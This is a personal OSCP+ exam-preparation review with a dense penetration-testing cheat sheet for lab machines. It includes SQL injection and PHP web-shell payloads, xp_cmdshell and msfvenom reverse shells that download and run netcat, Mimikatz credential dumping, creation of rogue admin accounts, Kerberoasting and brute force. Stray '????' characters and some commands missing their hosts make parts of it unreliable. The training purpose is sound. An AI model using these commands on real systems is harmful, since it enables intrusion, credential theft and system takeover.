Muhammad Noman's OSCP+ Journey: A Comprehensive Review

The PEN-200 Course

PEN-200 is a hands-on, self-study pentesting course that aims to teach the mindset, skills, and tools needed to develop strong foundational pentesting skills for InfoSec professionals

The OSCP+ Certification Exam

The exam is a practical hands-on assessment that tests the student's ability to gain unauthorised access to multiple presented systems within a given time limit. The current structure of the proctored exam is as follows.

  • Practical exam time 24 hours.
  • Exploit up to 6 hosts gaining at least 70 out of 100 points.
  • 3 standalone hosts, each worth 20 points (10 points for user level access, 10 points for system/root level access).
  • 1 Active Directory Set worth 40 points (2 clients, 1 Domain Controller). with
  • Machine 01 (10 Marks) | Machine 02 (10 Marks) | DC 01 (20 Marks)
  • Exam Reporting time 24 hours.

Students must submit a report within 24 hours of the practical assessment detailing all exploitation techniques used during the exam. An incomplete write-up will result in 0 points for any associated hosts.

My path to OSCP+

I have extensive experience as a web penetration tester and am already OSCP certified. For me, cracking OSCP+ wasn’t too challenging. However, if you’re not familiar with penetration testing concepts or haven’t achieved OSCP+ certification yet, I recommend following this path to build a solid foundation. I started with the eJPT certification and course content from INE. I learned a lot, and then I moved on to OffSec's official content, using the TJNull list to solve a few machines. For the rest, I walked through them, noting down everything — how to gain initial access and perform privilege escalation. As for Active Directory, I learned from OffSec's content; you can find further details in the Active Directory section of this article I would recommend two path for you

·???????? eJPT then OSCP+?? OR

·???????? eJPT then (CEH(P), eCPPTv2, PNPT, eWPTX) last OSCP+


1.?for Initial Access work on eJPT, This article and official content

2. Windows Privilege Escalation use TCM security, official content, YouTube videos

3. Linux Privilege Escalation TCM Linux, ?official content, YouTube videos

4. Active Directory official content, this article and search more content

LABS Platforms

One of the best choices for a lab is Tjnull, which includes machines from Hack The Box, TryHackMe, Proving Grounds (practice), and the official OffSec labs for play

When you buy the OSCP+, you receive a 3-month subscription that includes different labs, namely Secura, OSCP A, OSCP B, OSCP C, Relia, Medtech, and Skylark, totaling 66 labs. There are different approaches to solving these machines. I began with OSCP A, B, C and then proceeded to Medtech, Relia, and Skylark and Secura. They currently have two additional labs, Zeus and Poseidon, which are not included in the OSCP+ curriculum. However, if you want to gain hands-on experience and prepare effectively for OSCP+, these labs can provide significant benefits.

Recommendation for OSCP+

I have divided the content into four different sections with the following headings

1.?Initial Access with Different Ports


  • If you find credentials, use ports 21, 22, 3389, web login pages (HTTP listening ports), port 161 (evil-winram), and databases.
  • Try a high-access approach first, targeting systems with elevated rights such as RDP and SSH.
  • Always check the /.ssh/ directory for RSA and authorized keys.


  • autorecon <ip>? (best tool with UDP and TCP scan, you don’t want to use -sU -sT)
  • nmap -A -Pn <ip> (Best Nmap command for initial access)
  • nmap -sC -sV -A -T4 -Pn -o 101.nmap ( * always check version for each port vsftp 3.02 exploitable search google or searchsploits)
  • ·Test-NetConnection -Port 445 (check 445 is on) 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("", $)) "TCP port $ is open"} 2>$null??? (check port 1 to 1024)?? (for window)
  • For each port nmap -sC -A -p21 <ip>?? (for specific Port)

Port 21 FTP:

There is username and password on this you can upload shell on direcotry or find downloads files for initial access

  • nmap --script=ftp-* -p 21 $ip? (scan complete FTP Port)
  • check if anonymous allowed then use ftp anonymous@ip? (password also anonymous)
  • there is some mod if ls dir not work then apply use passive (to go in active mod).
  • ·mget * (# Download everything from current directory like zip, pdf, doc)
  • send/put (# Send single file or upload shell command)
  • after download files always use exiftool –u -a <filename> (Meta description for users)
  • ·FTP version above 3.0 not exploitable

Port 22 SSH:

  • you can’t get initial access directly however we can login with user and password and private key.
  • ssh noman@ip
  • ssh -p 2222 [email protected] ( ssh use with different port )
  • curl https://<ip>/index.php?page=../../../../../../../../../home/noman/.ssh/id_rsa
  • chmod 600 id_rsa ?and then ssh -i id_rsa -p 2222 noman@ip
  • user/.ssh/authorized key

PORT 25 (relying server to server) 465 (mail client to server)

  • You can send phishing email with this port to get reverse shell.
  • Used to send, receive, and relay outgoing emails and Main attacks are user enumeration and using an open relay to send spam
  • nmap --script=smtp* -p 25
  • always login with telnet <ip> 25

Port 53 DNS:

General enumeration for domain to find hostname and subdodmain etc

  • Nslookup <ip> ??| Dig <ip> | Host <ip> | host -t ns $ip ?| subdomains, host , ip | dnsenum

Port 80 , 8080, 443:

When executing Nmap, you may discover HTTP ports like 80, 81, 8080, 8000, 443, etc. There's a possibility of finding four HTTP ports on one machine.

In the very first step, run Nmap with an aggressive scan on all ports:

nmap -sC -sV -A -T4 -Pn -p80,81,8000,8080,443

Simply copy the version name of the website and search on Google to find an exploit.

Furthermore, Nmap reveals some files such as robots.txt, index.html, index.php, login.php, cgi-sys, cgi-mod, and cgi-bin.

If you encounter a host error, find a hostname with port 53 or discover a name in the website source code, footer, contact us, etc.

Then add that discovered domain in the /etc/hosts file to access the site.

Content Discovery:

  • gobuster dir -u -w? /wd/directory-list-2.3-big.txt (simple run)
  • gobuster dir -u -w? /wd/directory-list-2.3-big.txt (with different port)
  • gobuster dir -u -w? /wd/directory-list-2.3-big.txt (if you find noman then enumerate noman directory)
  • With the help of content discovery, you will find hidden directories, CMS web logins, files, etc. This is a crucial step in OSCP+.
  • Utilizing content discovery and Nmap, you can identify CMS, static pages, dynamic websites, and important files like databases, .txt, .pdf, etc. Additionally, you can enumerate websites with automated tools such as WPScan, JoomScan, Burp Suite, and uncover web vulnerabilities like RCE, SQLi, upload functionality, XSS, etc.
  • If you find any CMS like WordPress, Joomla, etc., simply search on Google for default credentials or exploits of theme, plugin, version etc. In the case of a login page, you can exploit SQL injection and launch a brute-force attack with Hydra. If you identify any CMS, scan it with tools, perform enumeration with brute force, check default usernames and passwords, explore themes, plugins, version exploits, and search on Google. Alternatively, you can discover web vulnerabilities to gain initial access.


  • wpscan --url --enumerate u
  • wpscan --url -e vp --plugins-detection mixed --api-token API_TOKEN
  • wpscan --url -e u --passwords /usr/share/wordlists/rockyou.txt
  • wpscan --url -U admin -P /usr/share/wordlists/rockyou.txt


Adobe Cold Fusion


  • Google the vulnerabilities
  • default login are admin:admin at /vtigercrm/
  • able to upload shell in profile-photo


  • Admin page - /administrator
  • Configuration files configuration.php | diagnostics.php | | ?


  • Config files >> configuration.php |

Login page

  • Try common credentials such as admin/admin, admin/password and falafel/falafel.
  • Determine if you can enumerate usernames based on a verbose error message.
  • Manually test for SQL injection. If it requires a more complex SQL injection, run SQLMap on it.
  • If all fails, run hydra to brute force credentials.
  • View source code
  • Use default password
  • Brute force directory first (s’’ometime you don't need to login to pwn the machine)
  • Search credential by bruteforce directory
  • bruteforce credential
  • Search credential in other service port
  • Enumeration for the credential
  • Register first
  • SQL injection
  • XSS can be used to get the admin cookie
  • Bruteforce session cookie

Web Vulnerability:


  • Pentestmonkey?cheatsheet
  • Try?admin'#?(valid username, see netsparker sqli cheatsheet)
  • Try?abcd' or 1=1;--
  • Use?UNION SELECT null,null,.. instead of 1,2,.. to?avoid type conversion?errors
  • For?mssql,
  • xp_cmdshell
  • Use?concat?for listing 2 or more column data in one
  • For?mysql,
  • try?a' or 1='1 -- -
  • A' union select?"" into?outfile?"C:\xampp\htdocs\run.php" -- -'

File Upload:

  • Change mime?type
  • Add?image headers
  • Add payload in?exiftool?comment?and name file as file.php.png
  • ExifTool 1. <?php system($_GET['cmd']); ?> //shell.php 2. exiftool "-comment<=shell.php" malicious.png 3. strings malicious.png | grep system

use automated tool

  • nikto ? nikto -h $ip ? nikto -h $ip -p 80,8080,1234 #test different ports with one scan


Download .git

  • Extract .git content
  • mkdir <EXTRACT_FOLDER>


SSL Enumeration

  • Open a connection openssl s_client -connect $ip:443

Port 161 UDP:

This will give you the username password or any hint for login

  • It will get with autorecon (UDP Port)
  • nmap -sU -p161 --script "snmp-*" $ip
  • nmap -n -vv -sV -sU -Pn -p 161,162 –script=snmp-processes,snmp-netstat IP
  • snmpwalk -v 1 -c public NET-SNMP-EXTEND-MIB::nsExtendOutputFull (this is command I have used in 2 3 machine to find username, password, or hint of user and pass
  • evil-winrm -I -u ‘noman’ -p ‘nomanpassword’? (login with this command)

PORT 139, port 445? (also PORT 137 (name services) & PORT 138 (datagam) UDP netbios)

Always check guest login and then check public share with write and execute permission and you will find credential, files pdf ps1 etc

  • nmap -v -script smb-vuln* -p 139,445
  • smbmap -H (public shares) (check read write and execute)
  • smbmap -H -R tmp?? (check specific folder like tmp)
  • enum4linux -a (best command to find details and users list)
  • smbclient -p 4455 -L // -U noman --password=noman1234
  • smbclient -p 4455 // -U noman --password noman1234? (login)

Port 3389 RDP

There are two methods for this port: one involves finding credentials with another port, and the other employs brute force.

  • There is only one method to find credentials on this port, which involves a brute force attack using Hydra
  • hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
  • then further login with xfreerdp
  • xfreerdp /v:noman /u:passwordnoman /p: /workarea /smart-sizing
  • rdesktop $ip


Find credential with other port and use default to login

  • nmap -sV -Pn -vv -script=mysql* $ip -p 3306
  • mysql -u root -p 'root' -h -P 3306
  • select version(); | show databases;? | use databse | select * from users; | show tables |? select system_user(); | SELECT user, authentication_string FROM mysql.user WHERE user = Pre

MSSQL 1433, 4022, 135, 1434, UDP 1434

For this port, you can find credentials from another port and log in with ipacket-mssqlclient

  • nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip
  • impacket-mssqlclient noman:'Noman@321@1!'@
  • impacket-mssqlclient Administrator: 'Noman@321@1!'@ -windows-auth
  • SELECT @@version;? | SELECT name FROM sys.databases;? | SELECT FROM offsec.information_schema.tables;? |? select from offsec.dbo.users;

Connect as CMD database

  • SQL> EXECUTE sp_configure 'show advanced options', 1;
  • SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
  • EXEC xp_cmdshell 'whoami';
  • exec xp_cmdshell 'cmd /c powershell -c "curl -o \windows\temp\nc.exe"';
  • exec xp_cmdshell 'cmd /c dir \windows\temp';
  • exec xp_cmdshell 'cmd /c "\windows\temp\nc.exe 443 -e cmd"';
  • also applied on SQL Injection login

PORT 5437 & PORT 5432 PostgreSQL

  • If you find this port, follow the commands below, and you can easily find credentials from another port as well
  • 5437/tcp open?? postgresql?? PostgreSQL DB 11.3 - 11.7
  • msf6 exploit(linux/postgres/postgres_payload) > options and set all values rhost lhost port LHOST? tun0
  • OR | psql -U postgres -p 5437 -h IP? |? select pg_ls_dir(‘./’);? | select pg_ls_dir(‘/etc/password’);? | select pg_ls_dir(‘/home/wilson’);? | select pg_ls_dir(‘/home/Wilson/local.txt’);

2. Windows Privilege Escalation

I have used this approach:

????????? Run whoami /all (if enabled, then use printspoofer or got potato).

????????? Simply run PowerUp, then find privileges on unquoted DLL, etc.

????????? Upload WinPEAS for further enumeration if the above does not work. WinPEAS mostly finds plaintext passwords.

????????? Lastly, find any executable (exe), PowerShell script (ps1), or PDF file running. Run it for further enumeration and search on Google for additional details.


????????? certutil.exe -urlcache -split -f ( only run on cmd)

????????? iwr -uri -Outfile PowerUp.ps1 (power shell)

????????? curl -Outfile?PowerUp.ps1 (both)

????????? Start http server with python3 -m http.server 80 or 81 etc

Plaintext Password

?????????????? Folders Name: C Folder | Document Folder

?????????????? To find a password

?????????????? run winpeas

?????????????? check history with command

?????????????? check exe files in C or desktop etc

?????????????? \users\noman\documents\fileMonitorBackup.log

File Permission

F> Full access | M> Modify access |RX> Read and execute access| R>Read-only access| W>Write-only

?????????????? icacls "C:\xampp\apache\bin\fida.exe"? (check permission)

Automated Tools


Winpeas.exe (all including plaintext passwd)

Manual Enumeration

????????? Systeminfo?? OR? systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

????????? Hostname | Whoami | wmic qfe (updates and patches etc)

????????? Wmic logicaldisk (drives)

????????? echo %USERNAME% || whoami then $env:username

????????? Net user | net user noman

????????? Net localgroup | net localgroup noman

????????? netsh firewall show state (firewall)

????????? Whoami /priv

????????? Ipconfig | ipconfig /all? |

????????? netstat -ano | route print

????????? Powershell | Get-LocalUser | Get-LocalGroup | Get-LocalGroupMember Administrators

????????? Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname?? (check software with version 32 bit and below 64)

????????? Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

????????? Get-Process

????????? If RDP is enable or we enable it then add this

????????? net localgroup administrators /add

????????? Unattended Windows Installatiom (old files of user n pass then crack)

????????? dir /s sysprep.inf sysprep.xml unattended.xml unattend.xml *unattended.txt 2>null

GoldMine Password/plaintext

  • 1st Technique (Common Password)
  • Readable location |
  • findstr /si password .txt | .xml | *.ini
  • Registry? | (IF VNC install)
  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (autologin)
  • Configuration | files with winpeas
  • SAM? |winpeas (looking for common Sam and System backups)
  • Attacker machine move then dcrypt with tool creddump-master
  • OR
  • Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue (findbackup file)
  • Get-ChildItem -Path C:\xampp -Include .txt,.ini -File -Recurse -ErrorAction SilentlyContinue (check files) | type C:\xampp\passwords.txt | type C:\xampp\mysql\bin\my.ini
  • Get-ChildItem -Path C:\Users\dave\ -Include .txt,.pdf,.xls,.xlsx,.doc,.docx -File -Recurse -ErrorAction SilentlyContinue?? (check doc txt etc)
  • Another goldmine powershell Get-History?? | (Get-PSReadlineOption).HistorySavePath (found file then type noman.txt and if found command then do it because of taken root
  • cd C:\ | pwd | dir

SeImpersonatePrivilege enable

Whoami /priv and Whoami /all


  • curl -o Pr.exe
  • .\Pr.exe -i -c cmd? OR .\PrintSpoofer32.exe -i -c powershell.exe


  • curl -o god.exe
  • .\god.exe -cmd "cmd /c whoami"??? OR
  • curl -o nc.exe
  • .\god.exe -cmd "cmd /c C:\xampp\htdocs\cms\files\nc.exe 443 -e cmd"
  • .\god.exe -cmd "cmd /c C:\xampp\htdocs\cms\files\nc.exe 443 -e powershell"

Kernel Exploits

????????? Biopath modifiable service


????????? Permission check and service stop / start check

????????? Msfvenom create shell and upload ( curl, iwr, certutil)

????????? icacls "C:\Program Files"

????????? msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f exe -o rev.exe

????????? del "C:\program files\noman\noman.exe"

????????? curl -o noman.exe

????????? cp noman.exe "C:\program files\noman\"

????????? net start noman

unquoted path

????????? Get-UnquotedService

????????? Permission check and service stop / start check

????????? Msfvenom create shell and upload ( curl, iwr, certutil)

????????? icacls "C:\Program Files"

????????? msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f exe -o rev.exe

????????? del "C:\program files\noman\noman.exe"

????????? curl -o noman.exe

????????? cp noman.exe "C:\program files\noman\"

????????? net start noman

DLL Hijacking

????????? Permission check and service stop / start check

????????? Msfvenom create shell and upload ( curl, iwr, certutil)

????????? icacls "C:\Program Files"

????????? msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f dll -o rev.dll

????????? del "C:\program files\noman\noman.dll"

????????? curl -o noman.dll

????????? cp noman.dll "C:\program files\noman\"

????????? net start noman

Task scduler/cron job

·???????? schtasks /query /fo LIST /v? (find taskName: \Microsoft\CacheCleanup)

·???????? icacls C:\Users\noman\Pictures\Cleanup.exe??? user (I)(F) permission required)

????????? iwr -Uri -Outfile Cleanup.exe

????????? move .\Pictures\BackendCacheCleanup.exe Cleanup.exe.bak

????????? move .\Cleanup.exe .\Pictures\? (waiting for the execution and put file just one before the folder)

Linux Privilege Escalation

  • Start with automated tools like LinPEAS, then proceed with manual enumeration. The following command is used to get a TTY shell
  • python3 -c 'import pty; pty.spawn(["/bin/bash", "--rcfile", "/etc/bash.bashrc"])' --> full access shell

Automated Tools

·???????? python -m http.server 80

·???????? wget -o

·???????? chmod +x | ./ | ( ./ | tee filename.txt? )

Manual Enumeration

  • Approach permission checker/cron job/
  • cmd: ls -la /etc/passwd/ | ls -la /etc/shadow -- > check read/write permission | sudo su
  • sudo -l (
  • find / -user root -perm -4000 -print 2>/dev/null
  • getcap -r / 2>/dev/null (capabilities)(cap_setuid+ep)
  • find / -perm -u=s -type f 2>/dev/null
  • find / -type f -perm 0777 | find / -writable -type d 2>/dev/null
  • cat /etc/crontab (normal) | grep "CRON" /var/log/syslog (wildcarts)
  • history | cat .bashrc
  • GoldMine Password/plaintext
  • Backup files
  • Kernel Search with Google

4. Active Directory.

Active Directory is challenging for everyone, With the provided credentials, simply run an Nmap scan to enumerate services and open ports. Use the scan results to determine where to apply the credentials effectively based on the identified services. there are three different machines: Machine01, Machine02, Domain01. The Machine01 machine always begins with initial access and privilege escalation as a standalone. Please use the following steps to work on Active Directory:

1.?????? Run net user /domain.

2.?????? List users and run sharpHound.ps1 to find domain users (otherwise not in user list) and also with the steps below.

3.?????? Run secretdumps, and if you come from a reverse shell, then change the administrator password.

4.?????? For tunneling (use Chisel or run with SSH), if there is an issue, revert the machine.

5.?????? Find user and password from secretdumps, mimikatz c drive, config files, winpeas, etc.

6.?????? Check services with open ports such as 22, 1433, 5896, 5895, 445, etc.

7.?????? Use CrackMapExec with user and password, testing with the above services.

8.?????? Perform AS-REP Roasting with or Rubeus.exe.

9.?????? If SQL, use; if SMB, use; if WinRM or evil-winrm, check the administrator, then move to the next step to find the Windows root.

10.?? For Domain01:

11.?? Run secretsdump (Default administrator) with user pass or hash, same with psexec, winrm, SSH, etc.

12.?? Directly rooted."


After get privilege escalation then run following commands

·???????? Transfer SharpHound.ps1 to target & load in powershell ::

·???????? . . \SharpHound.ps1

·???????? Invoke-BloodHound -CollectionMethod All

·???????? Found users account domain01? (if you find user then don’t use below step)

·???????? transfer on kali

·???????? Create a new user (if you want or change administrator password)

·???????? net user noman Noman@321 /add

·???????? net localgroup administrators noman /add

·???????? net user administrator Noman@123 (password Changed of administrator)

·???????? run secret dump or use mimikatz to find user and password on machine01

·???????? use impacket for secret dump

·???????? python3 ./ ./administrator: Noman@[email protected] (check domain users with noman.domain specially default username and password

·???????? for MimiKatz?? privilege::debug | token::elevate | sekurlsa::logonpasswords


The first step is to start port forwarding, followed by running AS-REP Roasting with for Linux and Rubeus.exe for Windows. If neither method works, manually enumerate in Windows to find the username and password or again use mimikatz. If you are not an administrator, apply Windows privilege escalation techniques on it. This will help you gain privileges on Machine02.

·???????? run map on Macine02 with proxychains nmap -sT -sU -p22,161,135,139,445,88,3389

Port Forward with SSH?? (if port 22 is open in machine01)

·???????? ssh -D 8001 -C -q -N [email protected]

·???????? in /etc/proxychains4.conf? (add 9999)

·???????? socks5 8001

Port Forward with chisel

·???????? socks5 1080 add this in /etc/proxychains

·???????? ./chisel server -p 5555 --reverse

·???????? certutil -urlcache -split -f

·???????? chisel client R:socks

·???????? this is best article for chisel installation


WINDOW Kerberoasting with window Machine02

·???????? .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

·???????? sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule –force


./ For Macine02

·???????? make user firewall if off and you are local admin etc)

·???????? proxychains python3 impacket-GetNPUsers noman.domain/noman:Noman@123 -dc-ip

·???????? sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule –force

If SQL, use; if SMB, use; if WinRM or evil-winrm, check the administrator, then move to the next step to find the Windows root. If you find a lot of username and password then use crackmapexec for SMB, SQL, WinRm or evil-winrm


·???????? run map on Domain01 with proxychains nmap -sT -sU -p22,161,445,88,3389

·???????? check nmap for login and use crackmapexec. If you don’t want to use nmap then

·???????? simply login with psexec,winrm or winexe

·???????? if you cant find the username and password then use different method like pass the hash, silver ticket

General information

Reverse Shell

????????? Always copy the reverse shell from these links and check directly. If it doesn't work, then encode it with URL or encryption with base64.



Password cracking:

  • admin:admin admin:password root:root root:toor
  • Burpsuite if we want to
  • john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt
  • sudo gzip -d rockyou.txt.gz
  • hydra -l noman -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://
  • hydra -l noman -P /usr/share/wordlists/rockyou.txt http-post
  • hydra -l user -P /usr/share/wordlists/rockyou.txt http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
  • hashcat -b??? | hashcat.exe -b??? (linux and window? benchmark)
  • customize wordlists
  • head /usr/share/wordlists/rockyou.txt > demo.txt? | sed -i '/^1/d' demo.txt
  • if we want to add 1 in all password then | echo \$1 > demo.rule | hashcat -r demo.rule --stdout demo.txt
  • hash-identifier? (find hash if simple)
  • hashid??? (if id is available "$2y$10$)
  • ssh2john id_rsa > ssh.hash | hashcat -h | grep -i "ssh"??? (port22)

CRACK NTLM with MimiKatz

  • TargetWindow Get-LocalUser | open powershell | cd C:\tools | ls (| already install if not then install it) | token::elevate (check user permission) | lsadump::sam (dump all user ntlm) |
  • KALI vim noman.hash (copy noman hash) | hashcat --help | grep -i "ntlm" (check mode like ntml 1000 value) | hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Zip cracking

  • fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt'
  • zip2john > zip.john
  • john zip.john

Port Kill

sudo fuser -k 443/tcp

Commonly Asked Q&A

I’ve had many people ask me questions that I don’t have time to individually answer. Therefore, the following are my answers to the most asked questions.

1. I’m a beginner, how do I get started? What do you recommend before OSCP+?

Start with the eJPT certification, then move on to TJ_Null's list. Solve a few machines to assess your knowledge. After that, proceed to the official OffSec documentation and solve the labs."

2. Which service do I start enumerating first?

The first step is to scan all 65535 TCP ports and the top UDP ports. I recommend using an excellent tool called AutoRecon, which is permitted during the OSCP+ exam. Additionally, there are many port enumeration techniques. Most of the time, you'll gain initial access through HTTP ports like 80, 81, 443, 8080, and 8000. Run Gobuster to find vulnerabilities, RCE, etc. If you discover any credentials, try logging in on ports 21, 22, login pages, 3389, and 161.

Exam Tips

Set a time limit for each foothold (if time is up, MOVE ON)

Look for uncommon ports

Use manual enumeration over automated tools (I didn’t use any automated tools in the exam)

Do breadth-first enumeration instead of depth-first enumeration

Think about what you can enumerate from each service


Thank you, everyone. If you want to discuss anything related to OSCP+ or any other exam, just ping me. Thanks to OffSec for the OSCP+ Exam.

